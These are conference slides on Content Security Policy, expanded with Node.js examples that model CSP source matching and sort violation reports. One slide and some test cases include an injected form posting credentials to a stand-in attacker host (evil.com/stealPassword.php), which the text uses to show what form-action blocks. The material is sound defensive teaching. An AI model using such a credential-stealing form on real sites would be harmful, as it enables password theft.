Content Security Policy - The application security Swiss Army Knife
Scott Helme
My slides from dotSecurity 2016 on Content Security Policy.
1.
Content Security Policy - The application security Swiss Army Knife
@Scott_Helme | scotthelme.co.uk
Scott Helme
2.
Browser support
3.
What is CSP?
CSP is delivered as one more HTTP response header alongside the ones the server already sends:
cache-control: max-age=0, no-cache
content-encoding: gzip
content-security-policy: [policy goes here]
date: Fri, 22 Apr 2016 10:00:00 GMT
server: nginx
status: 200
4.
CSP Directives
child-src
connect-src
default-src
font-src
frame-src *
img-src
media-src
object-src
script-src
style-src
* deprecated in CSP Level 2 in favour of child-src. CSP Level 3 later reversed this: child-src is now the deprecated one and frame-src is back, so prefer frame-src in new policies.
5.
A basic policy
Content-Security-Policy: default-src 'self' mycdn.com
Every resource type may load from the page's own origin and from mycdn.com; anything else is blocked.
6.
Fine tuning
Content-Security-Policy: default-src 'self'; script-src 'self' cdnjs.cloudflare.com ajax.googleapis.com
<script src="https://ajax.googleapis.com/.../jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/.../bootstrap.min.js"></script>
script-src replaces default-src for scripts only; every other resource type still falls back to default-src.
7.
Fine tuning
Content-Security-Policy: default-src 'self'; script-src [source list]; style-src [source list]; img-src [source list]; child-src [source list];
8.
Mitigating XSS
<script>
  var message = "Hello World!!!";
  alert(message);
</script>
<script src="(scotthelme.co.uk)/js/message.js"></script>
A policy without 'unsafe-inline' blocks the first, inline, script, which is the form injected code usually takes; the same code moved into a file served from an allowed source still runs.
9.
Additional CSP Directives
form-action
frame-ancestors
block-all-mixed-content
upgrade-insecure-requests
10.
Additional CSP Directives: form-action
<form action="https://evil.com/stealPassword.php" method="post">
  ...
</form>
form-action restricts the URLs a form may submit to, so an injected form that posts credentials to evil.com is blocked even though its markup rendered.
11.
Additional CSP Directives: frame-ancestors
<iframe src="https://scotthelme.co.uk/"></iframe>
frame-ancestors controls which origins may embed the page in a frame (the CSP successor to X-Frame-Options); frame-ancestors 'none' stops the page being framed at all, which defeats clickjacking.
12.
Additional CSP Directives: block-all-mixed-content / upgrade-insecure-requests
<img src="http://imgur.com/kittens.png/">
On an HTTPS page, block-all-mixed-content blocks this plaintext HTTP image outright; upgrade-insecure-requests instead rewrites the request to https:// before it is sent.
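To make the fallback rules in slides 5-7 and 9-11 concrete, here is an added example (not from the slides) that models, in plain Node.js, the source matching a browser performs when it checks a load against a policy. It shows default-src standing in for unset fetch directives, script-src overriding it for scripts only, and form-action and frame-ancestors never inheriting default-src, which is the mistake that leaves forms and framing unrestricted under a policy that looks tight. The page and resource URLs in the demo are constructed; paths, nonces and hashes are not modelled.

```javascript
// Added example, not from Scott Helme's slides: a simplified model of the
// source matching a browser performs when it enforces a Content-Security-Policy
// header. It covers what the slides rely on: default-src as the fallback,
// per-directive source lists, 'self', scheme sources such as https:, host
// sources with *.wildcards and ports, and the directives that never fall back
// to default-src (form-action, frame-ancestors). Paths, nonces and hashes are
// deliberately out of scope. Node.js, no dependencies.

// Fetch directives that inherit default-src when they are not set themselves.
const FALLS_BACK_TO_DEFAULT = new Set([
  'script-src', 'style-src', 'img-src', 'font-src', 'media-src',
  'object-src', 'connect-src', 'child-src', 'frame-src',
]);

// "default-src 'self'; script-src 'self' cdnjs.cloudflare.com" ->
// Map { 'default-src' => ["'self'"], 'script-src' => ["'self'", 'cdnjs.cloudflare.com'] }
// If a directive name is repeated, the first occurrence wins, as in the spec.
function parsePolicy(header) {
  const directives = new Map();
  for (const raw of header.split(';')) {
    const tokens = raw.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!directives.has(name)) directives.set(name, tokens.slice(1));
  }
  return directives;
}

function defaultPort(protocol) {
  return protocol === 'https:' ? '443' : protocol === 'http:' ? '80' : '';
}

// Does one source expression permit `url` when loaded by a document at `page`?
function sourceMatches(source, url, page) {
  const s = source.toLowerCase();
  if (s === "'none'") return false;
  if (s === '*') return !['data:', 'blob:', 'filesystem:'].includes(url.protocol);
  if (s === "'self'") {
    return url.protocol === page.protocol && url.hostname === page.hostname &&
      (url.port || defaultPort(url.protocol)) === (page.port || defaultPort(page.protocol));
  }
  if (s.startsWith("'")) return false;                           // 'unsafe-inline', nonces, hashes: not URL matchers
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return url.protocol === s; // scheme source, e.g. https:
  // host source: [scheme://]host[:port], where host may start with "*."
  const m = s.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?([^:/]+)(?::(\d+|\*))?$/);
  if (!m) return false;
  const [, scheme, host, port] = m;
  if (scheme) {
    if (url.protocol !== `${scheme}:`) return false;
  } else if (url.protocol !== page.protocol &&
             !(page.protocol === 'http:' && url.protocol === 'https:')) {
    return false; // no scheme given: inherit the page's; http pages may also use https
  }
  if (host.startsWith('*.')) {
    if (!url.hostname.endsWith(host.slice(1))) return false; // *.cdn.com covers a.cdn.com, not cdn.com
  } else if (url.hostname !== host) {
    return false;
  }
  const urlPort = url.port || defaultPort(url.protocol);
  if (port === '*') return true;
  return urlPort === (port || defaultPort(url.protocol));
}

// Would a load governed by `directive` be permitted for a document at `pageUrl`?
function isAllowed(policyHeader, directive, resourceUrl, pageUrl) {
  const policy = parsePolicy(policyHeader);
  let sources = policy.get(directive);
  if (sources === undefined && FALLS_BACK_TO_DEFAULT.has(directive)) {
    sources = policy.get('default-src');
  }
  if (sources === undefined) return true; // nothing in the policy restricts this directive
  const url = new URL(resourceUrl);
  const page = new URL(pageUrl);
  return sources.some((src) => sourceMatches(src, url, page));
}

// Constructed demo: the policies from slides 5-7 and 9-11 against a page on scotthelme.co.uk.
const page = 'https://scotthelme.co.uk/ecdsa/';
const basic = "default-src 'self' mycdn.com";
const tuned = "default-src 'self'; script-src 'self' cdnjs.cloudflare.com ajax.googleapis.com";
const locked = "default-src 'self'; form-action 'self'; frame-ancestors 'none'";

console.log(isAllowed(basic, 'script-src', 'https://mycdn.com/app.js', page));                   // true
console.log(isAllowed(basic, 'img-src', 'https://evil.com/x.png', page));                         // false
console.log(isAllowed(tuned, 'script-src', 'https://ajax.googleapis.com/jquery.min.js', page));   // true
console.log(isAllowed(tuned, 'img-src', 'https://cdnjs.cloudflare.com/logo.png', page));          // false: img-src falls back to default-src, not script-src
console.log(isAllowed(locked, 'form-action', 'https://evil.com/stealPassword.php', page));        // false
console.log(isAllowed("default-src 'self'", 'form-action', 'https://evil.com/stealPassword.php', page)); // true: form-action never inherits default-src
```

The last line is the check worth keeping: a policy that only sets default-src does nothing for form targets or framing, so form-action and frame-ancestors have to be written out explicitly.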
13.
Testing CSP
Content-Security-Policy-Report-Only: [policy]
Report-Only evaluates the policy and reports violations but blocks nothing, so a policy can be trialled on live traffic before it is enforced.
14.
CSP Reporting
Content-Security-Policy-Report-Only: [policy]; report-uri https://scotthelme.report-uri.io
The browser POSTs each violation as JSON to the report-uri endpoint:
{
  "csp-report": {
    "document-uri": "https://scotthelme.co.uk/ecdsa/",
    "violated-directive": "script-src 'self'",
    "original-policy": "[policy here]",
    "blocked-uri": "https://evil.com",
    ...
  }
}
15.
Migrating from HTTP to HTTPS
Content-Security-Policy-Report-Only: default-src https:; report-uri https://scotthelme.report-uri.io
Every resource still loaded over http: generates a report, which yields the list of mixed content to fix before the switch to HTTPS.
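Slides 13-15 describe the Report-Only and report-uri flow from the browser's side. Below is an added example, not from the slides, of the endpoint side in Node.js: it parses the JSON body in slide 14's shape, discards violations caused by browser extensions, flags http: loads on an https: page as the mixed content slide 15 is hunting for, and groups the rest into a list to act on. The report bodies at the bottom are constructed for the example. One caveat: CSP Level 3 deprecates report-uri in favour of report-to, but browsers still send this format whenever report-uri is present.

```javascript
// Added example, not from the slides: the receiving side of report-uri. A browser
// POSTs a JSON body (Content-Type application/csp-report) shaped like the one on
// slide 14; this parses it, throws away the noise that browser extensions
// generate, and groups what is left by directive and blocked host, so that a
// Report-Only rollout (slides 13-15) produces a short allowlist to review
// rather than a pile of raw JSON. The report bodies below are constructed.

const EXTENSION_SCHEMES = ['chrome-extension:', 'moz-extension:', 'safari-extension:', 'about:'];

// Normalise one report body into a flat record, or null if it is not a CSP report.
function parseReport(body) {
  let parsed;
  try { parsed = JSON.parse(body); } catch { return null; }
  const r = parsed && parsed['csp-report'];
  if (!r || typeof r['violated-directive'] !== 'string') return null;
  return {
    documentUri: String(r['document-uri'] || ''),
    // Older browsers send the whole directive ("script-src 'self'"); keep the name only.
    directive: String(r['effective-directive'] || r['violated-directive']).split(/\s+/)[0].toLowerCase(),
    blockedUri: String(r['blocked-uri'] || ''),
    originalPolicy: String(r['original-policy'] || ''),
  };
}

function blockedHost(blockedUri) {
  try { return new URL(blockedUri).host; } catch { return blockedUri; }
}

// What kind of fix does this violation point at?
function classify(r) {
  const b = r.blockedUri;
  if (EXTENSION_SCHEMES.some((s) => b.startsWith(s))) return 'extension-noise'; // the user's add-ons, not your page
  if (['', 'self', 'inline', 'eval'].includes(b)) return 'inline-code';           // needs a hash, a nonce, or a refactor
  if (/^(data|blob)(:|$)/.test(b)) return 'data-or-blob';
  if (b.startsWith('http://') && r.documentUri.startsWith('https://')) return 'mixed-content'; // the slide 15 case
  return 'external-host';                                                         // candidate for the allowlist
}

// Group reports into findings sorted by frequency, and count what was discarded.
function triage(bodies) {
  const counts = new Map();
  let dropped = 0;
  for (const body of bodies) {
    const r = parseReport(body);
    if (r === null) { dropped += 1; continue; }
    const category = classify(r);
    if (category === 'extension-noise') { dropped += 1; continue; }
    const where = category === 'inline-code' ? '-' : blockedHost(r.blockedUri);
    const key = `${r.directive} | ${category} | ${where}`;
    counts.set(key, (counts.get(key) || 0) + 1);
  }
  const findings = [...counts.entries()]
    .map(([key, count]) => ({ key, count }))
    .sort((a, b) => b.count - a.count || a.key.localeCompare(b.key));
  return { findings, dropped };
}

// Constructed sample of what a report-uri endpoint might receive during a Report-Only run.
const report = (fields) => JSON.stringify({ 'csp-report': {
  'document-uri': 'https://scotthelme.co.uk/ecdsa/',
  'original-policy': "default-src 'self'; report-uri https://scotthelme.report-uri.io",
  ...fields,
} });
const SAMPLE_BODIES = [
  report({ 'violated-directive': "script-src 'self'", 'blocked-uri': 'https://evil.com' }),
  report({ 'violated-directive': "script-src 'self'", 'blocked-uri': 'https://evil.com/x.js' }),
  report({ 'violated-directive': 'script-src', 'effective-directive': 'script-src', 'blocked-uri': 'inline' }),
  report({ 'violated-directive': 'default-src https:', 'blocked-uri': 'http://imgur.com/kittens.png' }),
  report({ 'violated-directive': 'script-src', 'blocked-uri': 'chrome-extension://abcdefgh/inject.js' }),
  '{"not": "a csp report"}',
  'garbage',
];

console.log(triage(SAMPLE_BODIES));
```

Two practical points the grouping is built around: the endpoint is reachable by anyone, so every field is treated as untrusted text and never echoed into HTML or logs unescaped, and counting by host rather than by full URL is what turns thousands of reports into a handful of decisions.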
16.
Thanks!
@Scott_Helme | scotthelme.co.uk
Scott Helme